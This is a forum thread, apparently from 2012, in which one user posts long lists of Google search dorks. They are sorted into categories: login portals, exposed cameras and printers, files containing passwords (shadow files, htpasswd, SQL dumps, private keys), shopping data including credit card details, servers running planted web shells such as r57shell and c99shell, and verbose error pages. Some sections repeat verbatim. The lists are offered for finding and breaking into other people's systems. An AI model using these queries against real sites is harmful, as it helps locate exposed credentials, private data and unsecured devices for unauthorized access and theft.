11-01-2012, 04:35 AM
phpWebMail

filetype:php inurl:"webeditor.php"

CGI:IRC Login

Outlook Web Access (a better way)

"ttawlogin.cgi/?action="

intitle:"Welcome Site/User Administrator" "Please select the language" -demos

intitle:"ZyXEL Prestige Router" "Enter password"

filetype:r2w r2w

inurl:search/admin.php

inurl:/eprise/

intitle:"Dell Remote Access Controller"

"please log in"

inurl:login filetype:swf swf

inurl:"webadmin" filetype:nsf

intitle:"eMule *" intitle:"- Web Control Panel" intext:"Web Control Panel" "Enter your password here."

inurl:/Citrix/Nfuse17/

inurl:metaframexp/default/login.asp | intitle:"Metaframe XP Login"

intitle:Remote.Desktop.Web.Connection inurl:tsweb

intitle:"MikroTik RouterOS Managing Webpage"

"VNC Desktop" inurl:5800

inurl:/admin/login.asp

inurl:login.asp

inurl:":10000" intext:webmin

inurl:login.cfm

intitle:"ColdFusion Administrator Login"
am image
Various Online Devices

This category contains things like printers, video cameras, and all sorts of cool things found on the web with Google.

inurl:/level/15/exec/-

inurl:/exec/show/tech-support/cr

inurl:/level/15/exec/-/configure/http

allintitle:"SyncThru Web Service"

intitle:"EvoCam" inurl:"webcam.html"

intitle:Top "Vantage Service Gateway" -inurl:zyxel

intitle:"Net2Phone Init Page"

intitle:"Your Network Device" Status (LAN | WAN)

"Welcome to the CyberGuard unit!"

"LANCOM DSL/*-* Office *" "Entry Page"

inurl:wrcontrollite

allintitle:"DVR login"

intitle:"stingray fts login" | ( login.jsp intitle:StingRay )

intitle:"BlueNet Video Viewer"

allintitle: Axis 2.10 OR 2.12 OR 2.30 OR 2.31 OR 2.32 OR 2.33 OR 2.34 OR 2.40 OR 2.42 OR 2.43 "Network Camera "

intitle:"Live View / - AXIS" | inurl:view/view.shtml OR inurl:view/indexFrame.shtml | intitle:"MJPG Live Demo" | "intext:Select preset position"

intitle:"Divar Web Client"

allintitle: EDR400 login | Welcome

allintitle: EDR1600 login | Welcome

allintitle:Edr1680 remote viewer

allintitle: EverFocus | EDSR | EDSR400 Applet

intitle:"SNC-RZ30 HOME" -demo

inurl:cgi-bin/guestimage.html

(intitle:(EyeSpyFX|OptiCamFX) "go to camera")|(inurl:servlet/DetectBrowser)

intitle:"Veo Observer XT" -inurl:shtml|pl|php|htm|asp|aspx|pdf|cfm -intext:observer

intitle:"iGuard Fingerprint Security System"

intitle:"Device Status Summary Page" -demo

(intitle:MOBOTIX intitle:PDAS) | (intitle:MOBOTIX intitle:Seiten) | (inurl:/pda/index.html +camera)

intitle:"IVC Control Panel"

intitle:"Edr1680 remote viewer"

"OK logout" inurl:vb.htm?logout=1

intitle:"DVR Client" -the -free -pdf -downloads -blog -download -dvrtop

intitle:"GigaDrive Utility"

intitle:"Ethernet Network Attached Storage Utility"

intitle:"Skystream Networks Edge Media Router" -securitytracker.com

intitle:"NAS" inurl:indexeng.html

intitle:"WxGoos-" ("Camera image"|"60 seconds" )

intitle:"AR-*" "browser of frame dealing is necessary"

intitle:"Webview Logon Page"

inurl:setdo.cgi intext:"Set DO OK"

intext:"Welcome to Taurus" "The Taurus Server Appliance" intitle:"The Taurus Server Appliance"

intitle:"::::: INTELLINET IP Camera Homepage :::::

intitle:"Dell Laser Printer *" port_0 -johnny.ihackstuff

DCS inurl:"/web/login.asp"

intitle:Axis inurl:"/admin/admin.shtml"

u0il
11-01-2012, 04:36 AM
==================================
Pages containing login portals 2

These are login pages for various services. Consider them the front door of a website's more sen- sitive functions.

intitle:"xams 0.0.0..15 - Login"

"HostingAccelerator" intitle:"login" +"Username" -"news" -demo

"inspanel" intitle:"login" -"cannot" "Login ID" -site:inspediumsoft.com

intitle:communigate pro entrance

intitle:"AlternC Desktop"

intitle:phpnews.login

intitle:"Cisco CallManager User Options Log On" "Please enter your User ID and Password in the spaces provided below and click the Log On button to co

inurl:"default/login.php" intitle:"kerio"

intitle:"Member Login" "NOTE: Your browser must have cookies enabled in order to log into the site." ext:php OR ext:cgi

"This section is for Administrators only. If you are an administrator then please"

intitle:"Welcome to Mailtraq WebMail"

intitle:"TOPdesk ApplicationServer"

"You have requested access to a restricted area of our website. Please authenticate yourself to continue."

inurl:textpattern/index.php

intitle:"Login to Cacti"

intitle:"XMail Web Administration Interface" intext:Login intext:password

intext:"Welcome to" inurl:"cp" intitle:"H-SPHERE" inurl:"begin.html" -Fee

allintitle:"Welcome to the Cyclades"

intitle:"VisNetic WebMail" inurl:"/mail/"

inurl:/SUSAdmin intitle:"Microsoft Software Update Services"

inurl:exchweb/bin/auth/owalogon.asp

inurl:Citrix/MetaFrame/default/default.aspx

inurl::2082/frontend -demo

intitle:"WorldClient" intext:"© (2003|2004) Alt-N Technologies."

intitle:open-xchange inurl:login.pl

intitle:"site administration: please log in" "site designed by emarketsouth"

inurl:gnatsweb.pl

intitle:"SFXAdmin - sfx_global" | intitle:"SFXAdmin - sfx_local" | intitle:"SFXAdmin - sfx_test"

intitle:"Zope Help System" inurl:HelpSys

intitle:ilohamail "Powered by IlohaMail"

intitle:ilohamail intext:"Version 0.8.10" "Powered by IlohaMail"

intitle:"inc. *** 3000 concentrator"

intext:"vbulletin" inurl:admincp

intitle:endymion.sakÃÆ'©.mail.login.pa ge | inurl:sake.servlet

inurl:bin.welcome.sh | inurl:bin.welcome.bat | intitle:eHealth.5.0

intitle:"Flash Operator Panel" -ext:php -wiki -cms -inurl:asternic -inurl:sip -intitle:ANNOUNCE -inurl: lists

intitle:asterisk.management.portal web-access

intitle:"ListMail Login" admin -demo

ext:cgi intitle:"control panel" "enter your owner password to continue!"

intitle:"VMware Management Interface:" inurl:"vmware/en/"

inurl:webmail./index.pl "Interface"

"Powered by UebiMiau" -site:sourceforge.net

allinurl:wps/portal/ login

inurl:"suse/login.pl"

intitle:"SuSE Linux Openexchange Server" "Please activate JavaScript!"

intitle:"Kurant Corporation StoreSense" filetype:bok

inurl:WCP_USER

intitle:opengroupware.org "resistance is obsolete" "Report Bugs" "Username" "password"

"Microsoft CRM : Unsupported Browser Version"

intitle:"welcome to netware *" -site:novell.com

intitle:Group-Office "Enter your username and password to login"

inurl:orasso.wwsso_app_admin.ls_login

intitle:"ePowerSwitch Login"

inurl:"usysinfo?login=true"

intext:"Mail admins login here to administrate your domain."

PhotoPost PHP Upload

PHPhotoalbum Statistics

PHPhotoalbum Upload

inurl:"631/admin" (inurl:"op=*") | (intitle:CUPS)

intitle:"VNC viewer for Java"

inurl:"Activex/default.htm" "Demo"

"pcANYWHERE EXPRESS Java Client"

intext:""BiTBOARD v2.0" BiTSHiFTERS Bulletin Board"

intitle:Login intext:"RT is © Copyright"

intitle:"Athens Authentication Point"

inurl:1810 "Oracle Enterprise Manager"

intitle:"WebLogic Server" intitle:"Console Login" inurl:console

intitle:"MX Control Console" "If you can't remember"

inurl:"1220/parse_xml.cgi?"

intitle:"vhost" intext:"vHost . 2000-2004"

intitle:"VitalQIP IP Management System"

intext:"Storage Management Server for" intitle:"Server Administration"

intitle:"PHP Advanced Transfer" inurl:"login.php"

inurl:coranto.cgi intitle:Login (Authorized Users Only)

inurl:/webedit.* intext:WebEdit Professional -html

intitle:"phpPgAdmin - Login" Language

inurl:postfixadmin intitle:"postfix admin" ext:php

intext:"Icecast Administration Admin Page" intitle:"Icecast Administration Admin Page"

inurl:irc filetype:cgi cgi:irc

intitle:"php icalendar administration" -site:sourceforge.net

inurl:login.php "SquirrelMail version"

inurl:/dana-na/auth/welcome.html

intitle:plesk inurl:login.php3

"OPENSRS Domain Management" inurl:manage.cgi

"Login - Sun Cobalt RaQ"

intitle:"ISPMan : Unauthorized Access prohibited"

intitle:"Virtual Server Administration System"

"VHCS Pro ver" -demo

inurl:confixx inurl:login|anmeldung

inurl:"calendar.asp?action=login"

"IMail Server Web Messaging" intitle:login

intitle:"remote assessment" OpenAanval Console

"WebExplorer Server - Login" "Welcome to WebExplorer Server"

intitle:"Philex 0.2*" -script -site:freelists.org

intitle:"MailMan Login"

intitle:"oMail-admin Administration - Login" -inurl:omnis.ch

intitle:"microsoft certificate services" inurl:certsrv
================
Network or vulnerability data 2

These pages contain such things as firewall logs, honeypot logs, network information, IDS logs

inurl:portscan.php "from Port"|"Port Range"

inurl:/adm-cfgedit.php

inurl:webutil.pl

inurl:statrep.nsf -gov

inurl:/cgi-bin/finger? "In real life"

inurl:/cgi-bin/finger? Enter (account|host|user|username)

filetype:php inurl:nqt intext:"Network Query Tool"

inurl:"map.asp?" intitle:"WhatsUp Gold"

ext:cgi intext:"nrg-" " This web page was created on "

((inurl:ifgraph "Page generated at") OR ("This page was built using ifgraph"))

inurl:"/catalog.nsf" intitle:catalog

u0il
11-01-2012, 04:44 AM
"Powered by phpOpenTracker" Statistics

site:netcraft.com intitle:That.Site.Running Apache

"this ***** is working fine!" "enter *" "URL***" * visit

"apricot - admin" 00h

"by Reimar Hoven. All Rights Reserved. Disclaimer" | inurl:"log/logdb.dta"

intitle:"Microsoft Site Server Analysis"

Analysis Console for Incident Databases

Looking Glass

"Version Info" "Boot Version" "Internet Settings"

intitle:"ADSL Configuration page"

filetype:vsd vsd network -samples -examples

filetype:pdf "Assessment Report" nessus

inurl:phpSysInfo/ "created by phpsysinfo"

"SnortSnarf alert page"

"Network Host Assessment Report" "Internet Scanner"

"This report lists" "identified by Internet Scanner"

intitle:"Nessus Scan Report" "This file was generated by Nessus"

am image

Pages containing login portals

These are login pages for various services. Consider them the front door of a website's more sen- sitive functions.

inurl:src/login.php

inurl:/dana-na/auth/

"Remote Supervisor Adapter II" inurl:userlogin_logo.ssi

||Powered by [ClipBucket 2.0.91]

intitle:ARI "Phone System Administrator"

intitle:"AdventNet ManageEngine ServiceDesk Plus" intext:"Remember Me"

inurl:"/?pagename=CustomerLogin"

inurl:"/?pagename=AdministratorLogin"

inurl:+:8443/login.php3

intitle:"Login to @Mail" (ext:pl | inurl:"index") -dwaffleman

"SurgeMAIL" inurl:/cgi/user.cgi ext:cgi

intitle:Ampache intitle:"love of music" password | login | "Remember Me." -welcome

FlashChat v4.5.7

intitle:"eXist Database Administration" -demo

(intitle:"WmSC e-Cart Administration")|(intitle:"WebMyStyle e-Cart Administration")

(intitle:"Please login - Forums powered by UBB.threads")|(inurl:login.php "ubb")

intitle:"SHOUTcast Administrator" inurl:admin.cgi

intitle:IMP inurl:imp/index.php3

intitle:"TWIG Login"

"SquirrelMail version" "By the SquirrelMail Development Team"

(intitle:"rymo Login")|(intext:"Welcome to rymo") -family

inurl:"/slxweb.dll/external?name=(custportal|webticketcust)"

intitle:"Employee Intranet Login"

inurl:"php121login.php"

Please enter a valid password! inurl:polladmin

intitle:"EZPartner" -netpond

intitle:"Login to @Mail" (ext:pl | inurl:"index") -dwaffleman

"Web-Based Management" "Please input password to login" -inurl:johnny.ihackstuff.com

inurl:2000 intitle:RemotelyAnywhere -site:realvnc.comg

inurl:"/admin/configuration. php?" Mystore

inurl:ids5web

"Powered by Midmart Messageboard" "Administrator Login"

intitle:Ovislink inurl:private/login

"intitle:3300 Integrated Communications Platform" inurl:main.htm

"bp blog admin" intitle:login | intitle:admin -site:johnny.ihackstuff.com

"Emergisoft web applications are a part of our"

intitle:"Admin login" "Web Site Administration" "Copyright"

"site info for" "Enter Admin Password"

inurl:webvpn.html "login" "Please enter your"

"This is a restricted Access Server" "Javascript Not Enabled!"|"Messenger Express" -edu -ac

intitle:"Merak Mail Server Web Administration" -ihackstuff.com

"Powered by Merak Mail Server Software" -.gov -.mil -.edu -site:merakmailserver.com -johnny.i- hackstuff

"iCONECT 4.1 :: Login"

intitle:"Novell Web Services" "GroupWise" -inurl:"doc/11924" -.mil -.edu -.gov -filetype:pdf

intitle:"*- HP WBEM Login" | "You are being prompted to provide login account information for *" | "Please provide the information requested and press

intitle:"EXTRANET login" -.edu -.mil -.gov -johnny.ihackstuff

intitle:"EXTRANET * - Identification"

intitle:"OnLine Recruitment Program - Login" -johnny.ihackstuff

intitle:"Docutek ERes - Admin Login" -edu

inurl:ocw_login_username

intitle:"iDevAffiliate - admin" -demo

intitle:"Supero Doctor III" -inurl:supermicro

"Please login with admin pass" -"leak" -sourceforge

intitle:"Admin Login" "admin login" "blogware"

intitle:"Login Forum Powered By AnyBoard" intitle:"If you are a new user:" intext:"Forum Powered By AnyBoard" inurl:gochat -edu

intitle:"Login to the forums - @[Only registered and activated users can see links]" inurl:login.cfm?id=

intitle:"i-secure v1.1" -edu

inurl:/modcp/ intext:Moderator+vBulletin

intitle:"PHProjekt - login" login password

"login prompt" inurl:GM.cgi

"Powered by Monster Top List" MTL numrange:200-

intitle:"Content Management System" "user name"|"password"|"admin" "Microsoft IE 5.5" -mambo -johnny.ihackstuff

"Please authenticate yourself to get access to the management interface"

"You have requested to access the management functions" -.edu

intitle:"web-cyradm"|"by Luc de Louw" "This is only for authorized users" -tar.gz -site:web-cyradm. org -johnny.ihackstuff

intext:"Master Account" "Domain Name" "Password" inurl:/cgi-bin/qmailadmin

intitle:"Content Management System" "user name"|"password"|"admin" "Microsoft IE 5.5" -mambo -johnny.ihackstuff

inurl:csCreatePro.cgi
======================
intitle:"Java Applet Page" inurl:ml

intitle:"Veo Observer Web Client"

intitle:"Middle frame of Videoconference Management System" ext:htm

intitle:"TANDBERG" "This page requires a frame capable browser!"

tilt intitle:"Live View / - AXIS" | inurl:view/view.shtml

intitle:"AXIS 240 Camera Server" intext:"server push" -help

intitle:"GCC WebAdmin" -gcc.ru

"RICOH Network Printer D model-Restore Factory"

printers/printman.html

intitle:"Dell Laser Printer M5200" port_0

inurl:"CgiStart?page="

inurl:"S=320x240" | inurl:"S=160x120" inurl:"Q=Mob

(cam1java)|(cam2java)|(cam3java)|(cam4java)|(cam5j ava)|(cam6java) -navy.mil -backflip -power. ne.jp

intitle:"Netopia Router (*.)""to view this site"

( intitle:"PacketShaper Login")|(intitle:"PacketShaper Customer Login")

intitle:"PacketShaper Customer Login"

intitle:"Dell *" inurl:port_0

"To view the Web interface of the SpeedTouch, JavaScript must be supported and enabled on your browser!" -site:webblernet.nl -site:ihackstuff.com -sit

inurl:start.htm?scrw=

intitle:"--- VIDEO WEB SERVER ---" intext:"Video Web Server" "Any time & Any where" username password

intext:"Powered by: Adobe PrintGear" inurl:admin

intitle:"InterJak Web Manager"

u0il
11-01-2012, 04:45 AM
Files containing passwords 2

Passwords found by Google

intitle:"Index of" passwords modified

inurl:lilo.conf filetype:conf password -tatercounter2000 -bootpwd -man

NickServ registration passwords

psyBNC config files

filetype:mdb inurl:users.mdb

inurl:ccbill filetype:log

inurl:ospfd.conf intext:password -sample -test -tutorial -download

inurl:zebra.conf intext:password -sample -test -tutorial -download

filetype:pwd service

filetype:sql password

filetype:sql +"IDENTIFIED BY" -cvs

filetype:ldb admin

filetype:cfg mrtg "target " -sample -cvs -example

filetype:dat wand.dat

signin filetype:url

filetype:netrc password

filetype:ini ws_ftp pwd

inurl:"slapd.conf" intext:"rootpw" -manpage -"Manual Page" -man: -sample

inurl:"slapd.conf" intext:"credentials" -manpage -"Manual Page" -man: -sample

filetype:inc dbconn

inurl:"wvdial.conf" intext:"password"

filetype:pem intext:private

filetype:conf slapd.conf

filetype:dat "password.dat"

filetype:log inurl:"password.log"

filetype:url +inurl:"ftp://" +inurl:"@"

inurl:vtund.conf intext:pass -cvs

filetype:reg reg HKEY_CURRENT_USER SSHHOSTKEYS

filetype:reg reg +intext:"defaultusername" +intext:"defaultpassword"

filetype:inc intext:mysql_connect

filetype:properties inurl:db intext:password

intitle:"index of" intext:globals.inc

inurl:perform filetype:ini

intitle:"index of" intext:connect.inc

eggdrop filetype:user user

filetype:cfm "cfapplication name" password

allinurl: admin mdb

intitle:Index.of etc shadow

inurl:secring ext:skr | ext:pgp | ext:bak

intitle:index.of administrators.pwd

htpasswd

passlist.txt (a better way)

trillian.ini

inurl:config.php dbuname dbpass

auth_user_file.txt

filetype:xls username password email

etc (index.of)

passlist

config.php

passwd / etc (reliable)

spwd.db / passwd

htpasswd / htgroup

htpasswd / htpasswd.bak

pwd.db

master.passwd
am image
Sensitive Online Shopping Info

Examples of queries that can reveal online shopping info like customer data, suppliers, orders, creditcard numbers, credit card info, etce

intext:"Powered by X-Cart: shopping cart software" -site:x-cart.com

intext:"powered by Hosting Controller" intitle:Hosting.Controller

site:ups.com intitle:"Ups Package tracking" intext:"1Z ### ### ## #### ### #"

inurl:midicart.mdb

"More Info about MetaCart Free"

inurl:shopdbtest.asp

Comersus.mdb database

VP-ASP Shop Administrators only

POWERED BY HIT JAMMER 1.0!
am image
Network or vulnerability data

These pages contain such things as firewall logs, honeypot logs, network information, IDS logs

intitle:r57shell +uname -bbpress

"The statistics were last updated" "Daily"-microsoft.com

inurl:/counter/index.php intitle:"+PHPCounter 7.*"

inurl:Crazy[Only registered and activated users can see links] intext:"detailed debugging information"

inurl:ovcgi/jovw

inurl:***** | inurl:wpad ext:pac | ext:dat findproxyforurl

inurl:webalizer filetype:png -.gov -.edu -.mil -opendarwin

intitle:"Retina Report" "CONFIDENTIAL INFORMATION"

"Shadow Security Scanner performed a vulnerability assessment"

"The following report contains confidential information" vulnerability -search

inurl:status.cgi?host=all

inurl:login.jsp.bak

"Traffic Analysis for" "RMON Port * on unit *"

"powered | performed by Beyond Security's Automated Scanning" -kazaa -example

intitle:"PHPBTTracker Statistics" | intitle:"PHPBT Tracker Statistics"

intitle:"BNBT Tracker Info"

intitle:"Azureus : Java BitTorrent Client Tracker"

inurl:"install/install.php"

intext:"Welcome to the Web V.Networks" intitle:"V.Networks [Top]" -filetype:htm

intitle:"start.managing.the.device" remote pbx acc

ext:cfg radius.cfg

filetype:php inurl:ipinfo.php "Distributed Intrusion Detection System"

inurl:"sitescope.html" intitle:"sitescope" intext:"refresh" -demo

intitle:"twiki" inurl:"TWikiUsers"

"Phorum Admin" "Database Connection" inurl:forum inurl:admin

"Output produced by SysWatch *"

inurl:testcgi xitami

filetype:log intext:"ConnectionManager2"

intitle:"sysinfo * " intext:"Generated by Sysinfo * written by The Gamblers."

u0il
11-01-2012, 04:46 AM
am image
Error Messages 2

Error messages that say WAY too much!

"An illegal character has been found in the statement" -"previous message"

"Syntax error in query expression " -the

supplied argument is not a valid PostgreSQL result

"PostgreSQL query failed: ERROR: parser: parse error"

"Incorrect syntax near"

"Unclosed quotation mark before the character string"

"ORA-00933: SQL command not properly ended"

"ORA-00921: unexpected end of SQL command"

"ORA-00936: missing expression"

"Supplied argument is not a valid MySQL result resource"

"You have an error in your SQL syntax near"

mysql error with query

Internal Server Error

IIS web server error messages

Windows 2000 web server error messages

IIS 4.0 error messages

sitebuilderpictures

sitebuilderfiles

sitebuildercontent

ORA-00921: unexpected end of SQL command

"Chatologica MetaSearch" "stack tracking:"

"supplied argument is not a valid MySQL result resource"

Coldfusion Error Pages
am image
Files containing passwords

Passwords found by Google

inurl:-cfg intext:"enable password"

"login: *" "password= *" filetype:xls

ext:php intext:"$dbms""$dbhost""$dbuser""$dbpasswd""$table_prefix""phpbb_installed"

inurl:"calendarscript/users.txt"

filetype:sql "insert into" (pass|passwd|password)

filetype:reg reg +intext:”WINVNC3à ¢â‚¬Â

ext:asa | ext:bak intext:uid intext:pwd -"uid..pwd" database | server | dsn

enable password | secret "current configuration" -intext:the

ext:passwd -intext:the -sample -example

inurl:"editor/list.asp" | inurl:"database_editor.asp" | inurl:"login.asa" "are set"

filetype:bak createobject sa

inurl:ventrilo_srv.ini adminpassword

"parent directory" +proftpdpasswd

ext:yml database inurl:config

inurl:"Sites.dat"+"PASS="

server-dbs "intitle:index of"

inurl:/yabb/Members/Admin.dat

"admin account info" filetype:log

"your password is" filetype:log

intitle:rapidshare intext:login

intext:"enable password 7"

filetype:dat inurl:Sites.dat

ext:inc "pwd=" "UID="

[WFClient] Password= filetype:ica

inurl:cgi-bin inurl:calendar.cfg

intitle:"phpinfo()" +"mysql.default_password" +"Zend Scripting Language Engine"

inurl:pass.dat

inurl:perform.ini filetype:ini

intext:"powered by EZGuestbook"

nurl:server.cfg rcon password

!Host=*.* intext:enc_UserPassword=* ext:pcf

[Only registered and activated users can see links] WebAdmin inurl:passwd.txt [Only registered and activated users can see links]|webadmin

filetype:inf sysprep

ext:txt inurl:unattend.txt

filetype:sql ("values * MD5" | "values * password" | "values * encrypt")

"Powered by DUpaypal" -site:duware.com

filetype:inc mysql_connect OR mysql_pconnect

ext:ini Version=4.0.0.4 password

ext:ini eudora.ini

intext:"powered by Web Wiz Journal"

inurl:filezilla.xml -cvs

inurl:"GRC.DAT" intext:"password"

filetype:log "See `ipsec --copyright"

"powered by dudownload" -site:duware.com

intitle:dupics inurl:(add.asp | default.asp | view.asp | voting.asp) -site:duware.com

"powered by duclassmate" -site:duware.com

"Powered by Duclassified" -site:duware.com "DUware All Rights reserved"

"Powered by Dudirectory" -site:duware.com

"Powered by Duclassified" -site:duware.com

filetype:ini inurl:"serv-u.ini"

inurl:pap-secrets -cvs

inurl:chap-secrets -cvs

filetype:ini inurl:flashFXP.ini

"Powered By Elite Forum Version *.*"

filetype:mdb wwforum

"index of/" "ws_ftp.ini" "parent directory"

filetype:config config intext:appSettings "User ID"

LeapFTP intitle:"index.of./" sites.ini modified

filetype:ini wcx_ftp

LeapFTP intitle:"index.of./" sites.ini modified

filetype:conf oekakibbs

"[Only registered and activated users can see links]*:*@www" domainname

filetype:bak inurl:"htaccess|passwd|shadow|htusers"

inurl:/db/main.mdb

inurl:nuke filetype:sql

filetype:ini ServUDaemon

filetype:pass pass intext:userid

"AutoCreate=TRUE password=*"

inurl:/[Only registered and activated users can see links]

filetype:pwl pwl

ext:pwd inurl:(service | authors | administrators | users) "# -FrontPage-"

u0il
11-01-2012, 04:46 AM
Vulnerable Servers

These searches reveal servers with specific vulnerabilities. These are found in a different way than the searches found in the "Vulnerable Files" section.

inurl:/vb/install/upgrade.php

inurl:/vb/install/install.php

"CGI-Telnet Unit-x Team Connected to *.com" OR "CGI-Telnet Unit-x Team Connected to"

"[Only registered and activated users can see links]*.com - c99shell" OR "[Only registered and activated users can see links]*.net - c99shell" OR "[Only registered and activated users can see links]*.org - c99shell"

"safe_mode: * PHP version: * cURL: * MySQL: * MSSQL: * PostgreSQL: * Oracle: *"

"r57shell"

"r57shell 1.4"

"[ phpinfo ] [ php.ini ] [ cpu ] [ mem ] [ users ] [ tmp ] [ delete ]"

inurl:index.php?pagedb=rss -Vulnerability -inurl

intitle:"Uploader - Uploader v6" -pixloads.com

intitle:"MvBlog powered"

intitle:"Horde :: My Portal" -"[Tickets"

inurl:rpSys.html

filetype:pl intitle:"Ultraboard Setup"

"Welcome to Administration" "General" "Local Domains" "SMTP Authentication" inurl:admin

XOOPS Custom Installation

"you can now password" | "this is a special page only seen by you. your profile visitors"

"set up the administrator user" inurl:pivot

"html allowed" guestbook

"Powered by: vBulletin Version 1.1.5"

inurl:"/NSearch/AdminServlet"

inurl:servlet/webacc

"There are no Administrators Accounts" inurl:admin.php -mysql_fetch_row

intitle:"Mail Server CMailServer Webmail" "5.2"

inurl:newsdesk.cgi? inurl:"t="

(inurl:/shop.cgi/page=) | (inurl:/shop.pl/page=)

inurl:aol*/_do/rss_popup?blogID=

natterchat inurl:home.asp -site:natterchat.co.uk

intitle:phpMyAdmin "Welcome to phpMyAdmin ***" "running on * as root@*"

"ftp://" "[Only registered and activated users can see links]"

intext:"Warning: * am able * write ** configuration file" "includes/configure.php" -Forums

allinurl:"index.php" "site=sglinks"

inurl:"index.php? module=ew_filemanager"

filetype:cgi inurl:"fileman.cgi"

filetype:cgi inurl:"Web_Store.cgi"

("Indexed.By"|"Monitored.By") hAcxFtpScan

"Welcome to the Prestige Web-Based Configurator"

filetype:php inurl:vAuthenticate

intitle:"Samba Web Administration Tool" intext:"Help Workgroup"

intitle:"Gateway Configuration Menu"

inurl:pls/admin_/gateway.htm

allinurl:install/install.php

allinurl:intranet admin

"Select a database to view" intitle:"filemaker pro"

"Welcome to PHP-Nuke" congratulations

inurl:info.inc.php

inurl:footer.inc.php

inurl:search.php vbulletin

"Welcome to Intranet"

intitle:"Remote Desktop Web Connection"

inurl:ManyServers.htm

Gallery in configuration mode

"YaBB SE Dev Team"

Hassan Consulting's Shopping Cart Version 1.18
am image
Error Messages

Error messages that say WAY too much!

"plugins/wp-db-backup/wp-db-backup.php"

allintext:"fs-admin.php"

intitle:"Apache Tomcat" "Error Report"

"Unable to jump to row" "on MySQL result index" "on line"

"Warning: Bad arguments to (join|implode) () in" "on line" -help -forum

"Warning:" "failed to open stream: HTTP request failed" "on line"

"Warning: mysql_connect(): Access denied for user: '*@*" "on line" -help -forum

"Warning: Division by zero in" "on line" -forum

filetype:asp + "[ODBC SQL"

"Warning: Supplied argument is not a valid File-Handle resource in"

intitle:"Default PLESK Page"

"Parse error: parse error, unexpected T_VARIABLE" "on line" filetype:php

"[SQL Server Driver][SQL Server]Line 1: Incorrect syntax near" -forum -thread -showthread

intitle:Configuration.File inurl:softcart.exe

"The script whose uid is " "is not allowed to access"

snitz! forums db path error

filetype:log "PHP Parse error" | "PHP Warning" | "PHP Error"

"ASP.NET_SessionId" "data source="

"ORA-12541: TNS:no listener" intitle:"error occurred"

filetype:php inurl:"logging.php" "Discuz" error

"Internal Server Error" "server at"

PHP application warnings failing "include_path"

intext:"Warning: Failed opening" "on line" "include_path"

ht://Dig htsearch error

intitle:"Error Occurred While Processing Request"

intitle:"Error using Hypernews" "Server Software"

"Invision Power Board Database Error"

"error found handling the request" cocoon filetype:xml

intitle:"Execution of this script not permitted"

intitle:"Error Occurred" "The error occurred in" filetype:cfm

warning "error on line" php sablotron

"Fatal error: Call to undefined function" -reply -the -next

filetype:asp "Custom Error Message" Category Source

"Can't connect to local" intitle:warning

intitle:"Under construction" "does not currently have"

"access denied for user" "using password"

"Warning: Cannot modify header information - headers already sent"

"Warning: pg_connect(): Unable to connect to PostgreSQL server: FATAL"

An unexpected token "END-OF-STATEMENT" was found

"detected an internal error [IBM][CLI Driver][DB2/6000]"

"A syntax error has occurred" filetype:ihtml

u0il
11-01-2012, 04:51 AM
Vulnerable Servers

These searches reveal servers with specific vulnerabilities. These are found in a different way than the searches found in the "Vulnerable Files" section.

inurl:/vb/install/upgrade.php

inurl:/vb/install/install.php

"CGI-Telnet Unit-x Team Connected to *.com" OR "CGI-Telnet Unit-x Team Connected to"

"[Only registered and activated users can see links]*.com - c99shell" OR "[Only registered and activated users can see links]*.net - c99shell" OR "[Only registered and activated users can see links]*.org - c99shell"

"safe_mode: * PHP version: * cURL: * MySQL: * MSSQL: * PostgreSQL: * Oracle: *"

"r57shell"

"r57shell 1.4"

"[ phpinfo ] [ php.ini ] [ cpu ] [ mem ] [ users ] [ tmp ] [ delete ]"

inurl:index.php?pagedb=rss -Vulnerability -inurl

intitle:"Uploader - Uploader v6" -pixloads.com

intitle:"MvBlog powered"

intitle:"Horde :: My Portal" -"[Tickets"

inurl:rpSys.html

filetype:pl intitle:"Ultraboard Setup"

"Welcome to Administration" "General" "Local Domains" "SMTP Authentication" inurl:admin

XOOPS Custom Installation

"you can now password" | "this is a special page only seen by you. your profile visitors"

"set up the administrator user" inurl:pivot

"html allowed" guestbook

"Powered by: vBulletin Version 1.1.5"

inurl:"/NSearch/AdminServlet"

inurl:servlet/webacc

"There are no Administrators Accounts" inurl:admin.php -mysql_fetch_row

intitle:"Mail Server CMailServer Webmail" "5.2"

inurl:newsdesk.cgi? inurl:"t="

(inurl:/shop.cgi/page=) | (inurl:/shop.pl/page=)

inurl:aol*/_do/rss_popup?blogID=

natterchat inurl:home.asp -site:natterchat.co.uk

intitle:phpMyAdmin "Welcome to phpMyAdmin ***" "running on * as root@*"

"ftp://" "[Only registered and activated users can see links]"

intext:"Warning: * am able * write ** configuration file" "includes/configure.php" -Forums

allinurl:"index.php" "site=sglinks"

inurl:"index.php? module=ew_filemanager"

filetype:cgi inurl:"fileman.cgi"

filetype:cgi inurl:"Web_Store.cgi"

("Indexed.By"|"Monitored.By") hAcxFtpScan

"Welcome to the Prestige Web-Based Configurator"

filetype:php inurl:vAuthenticate

intitle:"Samba Web Administration Tool" intext:"Help Workgroup"

intitle:"Gateway Configuration Menu"

inurl:pls/admin_/gateway.htm

allinurl:install/install.php

allinurl:intranet admin

"Select a database to view" intitle:"filemaker pro"

"Welcome to PHP-Nuke" congratulations

inurl:info.inc.php

inurl:footer.inc.php

inurl:search.php vbulletin

"Welcome to Intranet"

intitle:"Remote Desktop Web Connection"

inurl:ManyServers.htm

Gallery in configuration mode

"YaBB SE Dev Team"

Hassan Consulting's Shopping Cart Version 1.18
am image
Error Messages

Error messages that say WAY too much!

"plugins/wp-db-backup/wp-db-backup.php"

allintext:"fs-admin.php"

intitle:"Apache Tomcat" "Error Report"

"Unable to jump to row" "on MySQL result index" "on line"

"Warning: Bad arguments to (join|implode) () in" "on line" -help -forum

"Warning:" "failed to open stream: HTTP request failed" "on line"

"Warning: mysql_connect(): Access denied for user: '*@*" "on line" -help -forum

"Warning: Division by zero in" "on line" -forum

filetype:asp + "[ODBC SQL"

"Warning: Supplied argument is not a valid File-Handle resource in"

intitle:"Default PLESK Page"

"Parse error: parse error, unexpected T_VARIABLE" "on line" filetype:php

"[SQL Server Driver][SQL Server]Line 1: Incorrect syntax near" -forum -thread -showthread

intitle:Configuration.File inurl:softcart.exe

"The script whose uid is " "is not allowed to access"

snitz! forums db path error

filetype:log "PHP Parse error" | "PHP Warning" | "PHP Error"

"ASP.NET_SessionId" "data source="

"ORA-12541: TNS:no listener" intitle:"error occurred"

filetype:php inurl:"logging.php" "Discuz" error

"Internal Server Error" "server at"

PHP application warnings failing "include_path"

intext:"Warning: Failed opening" "on line" "include_path"

ht://Dig htsearch error

intitle:"Error Occurred While Processing Request"

intitle:"Error using Hypernews" "Server Software"

"Invision Power Board Database Error"

